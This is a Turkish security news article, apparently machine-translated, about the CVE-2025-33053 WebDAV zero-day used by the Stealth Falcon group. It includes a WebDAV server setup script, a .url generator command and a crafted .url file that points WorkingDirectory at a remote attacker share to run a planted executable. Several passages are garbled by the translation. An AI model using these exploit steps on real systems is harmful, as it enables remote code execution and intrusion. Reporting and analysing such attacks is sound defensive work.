Microsoft’un Web Dağıtılmış Yazarlık ve Sürüm (WebDAV) protokolünde kritik bir sıfır günlük güvenlik açığı, CVE-2025-33053Mart 2025’ten beri gelişmiş Kalıcı Tehdit (APT) Grubu Stealth Falcon tarafından aktif olarak sömürülmüştür.
Haziran ayında Salı günü yamalanan kusur, manipüle .url kısayol dosyaları aracılığıyla uzaktan kod yürütülmesini (RCE) sağlar ve Orta Doğu savunma sektörlerine yönelik saldırılara bağlanmıştır.
Güvenlik Açığı Genel Bakış
Rapora göre, CVE-2025-33053 (CVSS 8.8), saldırganların meşru Windows araçlarının çalışma dizinini kaçırmasına izin veriyor iediagcmd.exebunları saldırgan kontrollü WebDAV sunucularından kötü amaçlı yükler yürütmeye zorlamak.
.png
)
Temel Ayrıntılar:
| Bileşen | Detaylar |
|---|---|
| Etkilenen sistemler | Windows 10/11, Sunucu 2016-2025 ve eski desteklenmemiş sürümler |
| Mekanizma | Webdav’ın UNC Yolu İşlemesinin Kötüye Kullanımı Yeniden Yönlendirmek WorkingDirectory |
| İlk vektör | PDFS olarak maskelenen .url dosyaları ile kimlik avı e -postaları |
| Birincil yük | Horus ajanı (anti-analiz tekniklerine sahip mit çerçeve tabanlı implant) |
İstismarın teknik dökümü
Saldırı zinciri çok aşamalı bir işlemden yararlanır:
1. Webdav Server Dağıtım
Saldırganlar gibi komut dosyaları kullanıyor setup_webdav.sh WebDAV modülleriyle Apache2 sunucularını yapılandırmak için:
bash# Apache WebDAV configuration snippet
sudo a2enmod dav
sudo a2enmod dav_fs
mkdir /var/www/webdav
chown -R www-data:www-data /var/www/webdav
echo "\nDAV On\n " >> /etc/apache2/sites-available/000-default.conf
systemctl restart apache2
Bu, bir webdav uç noktası oluşturur http:// Kötü niyetli yürütülebilir dosyaları barındırmak için.
2. Kötü niyetli .url dosya üretimi
. gen_url.py Script Crafts .url Windows’un dosya yürütme siparişini kötüye kullanan dosyalar:
python# Example .url file generation command
python3 gen_url.py --ip 192.168.1.100 --exe "C:\Program Files\Internet Explorer\iediagcmd.exe" --out payload.url
Sonuçta:
text[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Açıldığında, iediagcmd.exe yürür route.exe Saldırganın Webdav sunucusundan yerine C:\Windows\System32.
Saldırı zinciri ve yük analizi
Stealth Falcon’un kampanyası sofistike bir iş akışını takip ediyor:
- İlk Erişim: Kötü niyetli .url dosyasını içeren bir zip arşivi ile kimlik avı e -postası.
- Sömürme: .Url dosya setleri
WorkingDirectoryBir WebDAV yoluna, DLL kaçırma veya doğrudan yürütülebilir uygulanabilir yan yükleme tetikler. - Yük dağıtım: Horus Loader (C ++ tabanlı) Horus ajanını enjekte ederken bir tuzak PDF’yi şifresini çözer
msedge.exekullanmaNtResumeThreadSistem çağrıları. - Kalıcılık: Ajan, HMAC-SHA256 bütünlük kontrolleri ile HTTP üzerinden AES şifreli C2 iletişimi kullanır.
Anti-analiz teknikleri:
- Meşru ikili dosyaların işleme oyulması.
- Manuel eşleme
kernel32.dllAPI kancalarından kaçmak için. - 17 satıcıda 100’den fazla antivirüs işlemini kontrol eder.
Azaltma ve yanıt
Microsoft’un yaması (KB503453) Webdav’ın çalışma dizinlerini ele almasını değiştirir. Kuruluşlar:
- Hemen Haziran 2025 Windows güncellemelerini uygulayın.
- Grup ilkesi aracılığıyla e -posta eklerinde dosyaları bloke edin.
- Şüpheli WebDAV bağlantılarını izleyin (örn.
\$$external-IP]\webdav).
Eski sistemler artık güncellemeler almıyor (örn. Windows 7), ağ segmentasyonu veya WebDAV protokolü engellemeyi gerektiren savunmasız kalıyor.
CVE-2025-33053, WebDAV gibi kullanımdan kaldırılmış protokollerin risklerini ve APT gruplarının gelişen lambasını vurgulamaktadır.
Stealth Falcon, Windows yardımcı programlarını yeniden düzenleyerek ve kara kanalları (Lolbins) ‘de kaldırarak, düşük seviyeli protokol kusurlarının modern savunmaları nasıl atlayabileceğini gösteriyor.
Sürekli yama yönetimi ve kullanıcı bilinçlendirme eğitimi bu tür tehditlerin azaltılmasında kritik öneme sahiptir.
Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin